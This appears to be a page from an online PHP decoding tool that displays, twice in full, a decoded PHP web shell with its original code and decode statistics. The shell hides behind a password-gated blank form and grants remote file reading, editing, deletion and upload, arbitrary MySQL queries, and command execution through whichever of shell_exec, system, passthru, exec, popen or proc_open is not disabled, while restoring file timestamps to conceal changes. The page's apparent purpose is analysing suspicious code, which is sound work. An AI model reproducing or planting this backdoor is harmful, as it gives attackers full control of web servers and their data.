Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php session_start(); $yFiRi = '2db45b0da09982ed3f220281acfb82d9';if(!empty($_POST['host'..
Decoded Output download
<?php session_start(); $yFiRi = '2db45b0da09982ed3f220281acfb82d9';if(!empty($_POST['host'])) { $lYB=$_POST['host']; }else { $lYB='127.0.0.1'; }if(!empty($_POST['user'])) { $_RLEF=$_POST['user']; }else { $_RLEF='root'; }if(!empty($_POST['pass'])) { $mSUpY=$_POST['pass']; }else { $mSUpY='password'; }if(!empty($_POST['base'])) { $pvJ=$_POST['base']; }else { $pvJ='dbase'; }if(!empty($_POST['p'])) { $_SESSION['passswd'] = md5($_POST['p']); } if(empty($_SESSION['passswd']) or $yFiRi != $_SESSION['passswd']) { die('<form method=post ><input name=p style="border:0; " type="text" ></form>');} $PUI='';if(!empty($_POST['path'])) { $WYcTx=$_POST['path']; if(!empty($_POST['openfile'])) { if(is_file($WYcTx)) { $PUI=file_get_contents($WYcTx); }elseif(is_dir($WYcTx)) { $PUI=$WYcTx."
"; if ($qFAr = opendir($WYcTx)) { while (($jUj = readdir($qFAr)) !== false) { $PUI .= "[".filetype($WYcTx .'/'. $jUj)."] $jUj
"; } closedir($qFAr); } } } if(!empty($_POST['save'])) { $dfEqX=@filemtime($_POST['save']); if(file_put_contents($WYcTx, $_POST['content'])) { if (!touch($_POST['save'], $dfEqX)) { echo "Error touch<br>"; } $PUI=file_get_contents($WYcTx); } else { $PUI='error save '.$WYcTx; } } if(!empty($_POST['mkdir'])) { if(mkdir($WYcTx)) { $PUI='ok create dir '.$WYcTx; } else { $PUI='error create dir '.$WYcTx; } } if(!empty($_POST['delete'])) { if(unlink($WYcTx)) { $PUI='ok remove '.$WYcTx; } else { $PUI='error remove '.$WYcTx; } } if(isset($_POST['u'])) { $ToVf=$_POST['n']; $gFwol=$_FILES['id']['tmp_name']; $YuZ = "from $gFwol "; if(move_uploaded_file($_FILES['id']['tmp_name'],$ToVf)) { $YuZ .= ' Copy success: '.$ToVf;} else { $YuZ .= ' Copy error: '.$ToVf; } }if(!empty($_POST['sql'])) {$zXZJ = $_POST['path'];$HFn = new mysqli($lYB, $_RLEF, $mSUpY, $pvJ);if ($HFn->connect_errno) { $PUI = " - Error Connect to host $lYB user: $_RLEF pass: $mSUpY - ". $HFn -> connect_error; }else {$PUI = " - SQL Query: $zXZJ
";if($I_w = mysqli_query($HFn, $zXZJ)) {while ($PCoaN = mysqli_fetch_array($I_w)) { foreach($PCoaN as $WDW=>$Isgrc) if(!is_int($WDW)) $PUI .= $WDW.": ".trim($Isgrc)."
"; }$PUI .= "
";} else { $PUI .= " - Query eror: " . $HFn -> error ."
"; }}}} ?><form method="POST" enctype="multipart/form-data">Path: <input type="text" name="path" value="<?php if(!empty($WYcTx)) { echo $WYcTx; } else { echo $_SERVER['DOCUMENT_ROOT']; } ?>" size="64"><input type="submit" name="openfile" value="open"> <input type="submit" name="mkdir" value="mkdir"> <input type="submit" name="delete" value="delete" onclick="return confirm('confirm delete');"><button type="submit" name="s" value=1 >system</button><input type="text" name="host" value="<?=$lYB ?>" > <input type="text" name="user" value="<?=$_RLEF ?>" ><input type="text" name="pass" value="<?=$mSUpY ?>" ><input type="text" name="base" value="<?=$pvJ ?>" "><button type="submit" name="sql" value=1 >mysqli</button><br><textarea name="content" style="width:100%; height: 500px;"><?php if(isset($_POST['s'])) { Hisn($WYcTx); } else echo $PUI ?></textarea><br><input type="submit" name="save" value="save" style="width:100%;"><br>Upload to: <input type="text" name="n" value="<?php echo $_SERVER['DOCUMENT_ROOT']; ?>/name.php" ><input type="file" name="id" /><button type="submit" name="u">Upload</button></form><?php function Hisn($FMGuW) {if (dUCKk('shell_exec')) { echo shell_exec($FMGuW);} else if(dUCKk('system')) { echo system($FMGuW);} else if(dUCKk('passthru')) { echo passthru($FMGuW);} else if(dUCKk('exec')) { echo exec($FMGuW);} else if(dUCKk('popen')) { $qcRf=popen($FMGuW,'r'); @pclose($qcRf);} else if(dUCKk('proc_open')) { $WUno=proc_open($FMGuW,$JYItD["descriptorspec"],$mvKG); while (!feof($mvKG[1])) { echo fread($mvKG[1],1024); } @proc_close($WUno);}} function dUCKk($Mos) { $dqWY=explode(",",@ini_get("disable_functions")); if (empty($dqWY)) { $dqWY=array(); } else { $dqWY=array_map('trim',array_map('strtolower',$dqWY)); } return (function_exists($Mos) && is_callable($Mos) && !in_array($Mos,$dqWY) ); }if (!dUCKk('shell_exec') and !dUCKk('proc_open') and !dUCKk('passthru') and !dUCKk('system') and !dUCKk('exec') and !dUCKk('popen')) { $geR="1";} else { $geR="0";} ?>Did this file decode correctly?
Original Code
<?php session_start(); $yFiRi = '2db45b0da09982ed3f220281acfb82d9';if(!empty($_POST['host'])) { $lYB=$_POST['host']; }else { $lYB='127.0.0.1'; }if(!empty($_POST['user'])) { $_RLEF=$_POST['user']; }else { $_RLEF='root'; }if(!empty($_POST['pass'])) { $mSUpY=$_POST['pass']; }else { $mSUpY='password'; }if(!empty($_POST['base'])) { $pvJ=$_POST['base']; }else { $pvJ='dbase'; }if(!empty($_POST['p'])) { $_SESSION['passswd'] = md5($_POST['p']); } if(empty($_SESSION['passswd']) or $yFiRi != $_SESSION['passswd']) { die('<form method=post ><input name=p style="border:0; " type="text" ></form>');} $PUI='';if(!empty($_POST['path'])) { $WYcTx=$_POST['path']; if(!empty($_POST['openfile'])) { if(is_file($WYcTx)) { $PUI=file_get_contents($WYcTx); }elseif(is_dir($WYcTx)) { $PUI=$WYcTx."\n"; if ($qFAr = opendir($WYcTx)) { while (($jUj = readdir($qFAr)) !== false) { $PUI .= "[".filetype($WYcTx .'/'. $jUj)."]\t$jUj\n"; } closedir($qFAr); } } } if(!empty($_POST['save'])) { $dfEqX=@filemtime($_POST['save']); if(file_put_contents($WYcTx, $_POST['content'])) { if (!touch($_POST['save'], $dfEqX)) { echo "Error touch<br>"; } $PUI=file_get_contents($WYcTx); } else { $PUI='error save '.$WYcTx; } } if(!empty($_POST['mkdir'])) { if(mkdir($WYcTx)) { $PUI='ok create dir '.$WYcTx; } else { $PUI='error create dir '.$WYcTx; } } if(!empty($_POST['delete'])) { if(unlink($WYcTx)) { $PUI='ok remove '.$WYcTx; } else { $PUI='error remove '.$WYcTx; } } if(isset($_POST['u'])) { $ToVf=$_POST['n']; $gFwol=$_FILES['id']['tmp_name']; $YuZ = "from $gFwol "; if(move_uploaded_file($_FILES['id']['tmp_name'],$ToVf)) { $YuZ .= ' Copy success: '.$ToVf;} else { $YuZ .= ' Copy error: '.$ToVf; } }if(!empty($_POST['sql'])) {$zXZJ = $_POST['path'];$HFn = new mysqli($lYB, $_RLEF, $mSUpY, $pvJ);if ($HFn->connect_errno) { $PUI = " - Error Connect to host $lYB user: $_RLEF pass: $mSUpY - ". $HFn -> connect_error; }else {$PUI = " - SQL Query: $zXZJ\n\n";if($I_w = mysqli_query($HFn, $zXZJ)) {while ($PCoaN = mysqli_fetch_array($I_w)) { foreach($PCoaN as $WDW=>$Isgrc) if(!is_int($WDW)) $PUI .= $WDW.":\t".trim($Isgrc)."\n"; }$PUI .= "\n";} else { $PUI .= " - Query eror: " . $HFn -> error ."\n"; }}}} ?><form method="POST" enctype="multipart/form-data">Path: <input type="text" name="path" value="<?php if(!empty($WYcTx)) { echo $WYcTx; } else { echo $_SERVER['DOCUMENT_ROOT']; } ?>" size="64"><input type="submit" name="openfile" value="open"> <input type="submit" name="mkdir" value="mkdir"> <input type="submit" name="delete" value="delete" onclick="return confirm('confirm delete');"><button type="submit" name="s" value=1 >system</button><input type="text" name="host" value="<?=$lYB ?>" > <input type="text" name="user" value="<?=$_RLEF ?>" ><input type="text" name="pass" value="<?=$mSUpY ?>" ><input type="text" name="base" value="<?=$pvJ ?>" "><button type="submit" name="sql" value=1 >mysqli</button><br><textarea name="content" style="width:100%; height: 500px;"><?php if(isset($_POST['s'])) { Hisn($WYcTx); } else echo $PUI ?></textarea><br><input type="submit" name="save" value="save" style="width:100%;"><br>Upload to: <input type="text" name="n" value="<?php echo $_SERVER['DOCUMENT_ROOT']; ?>/name.php" ><input type="file" name="id" /><button type="submit" name="u">Upload</button></form><?php function Hisn($FMGuW) {if (dUCKk('shell_exec')) { echo shell_exec($FMGuW);} else if(dUCKk('system')) { echo system($FMGuW);} else if(dUCKk('passthru')) { echo passthru($FMGuW);} else if(dUCKk('exec')) { echo exec($FMGuW);} else if(dUCKk('popen')) { $qcRf=popen($FMGuW,'r'); @pclose($qcRf);} else if(dUCKk('proc_open')) { $WUno=proc_open($FMGuW,$JYItD["descriptorspec"],$mvKG); while (!feof($mvKG[1])) { echo fread($mvKG[1],1024); } @proc_close($WUno);}} function dUCKk($Mos) { $dqWY=explode(",",@ini_get("disable_functions")); if (empty($dqWY)) { $dqWY=array(); } else { $dqWY=array_map('trim',array_map('strtolower',$dqWY)); } return (function_exists($Mos) && is_callable($Mos) && !in_array($Mos,$dqWY) ); }if (!dUCKk('shell_exec') and !dUCKk('proc_open') and !dUCKk('passthru') and !dUCKk('system') and !dUCKk('exec') and !dUCKk('popen')) { $geR="1";} else { $geR="0";}Function Calls
| session_start | 1 |
Stats
| MD5 | 3d7fc586ed38eda0f4b6efe3ef8a4edb |
| Eval Count | 0 |
| Decode Time | 86 ms |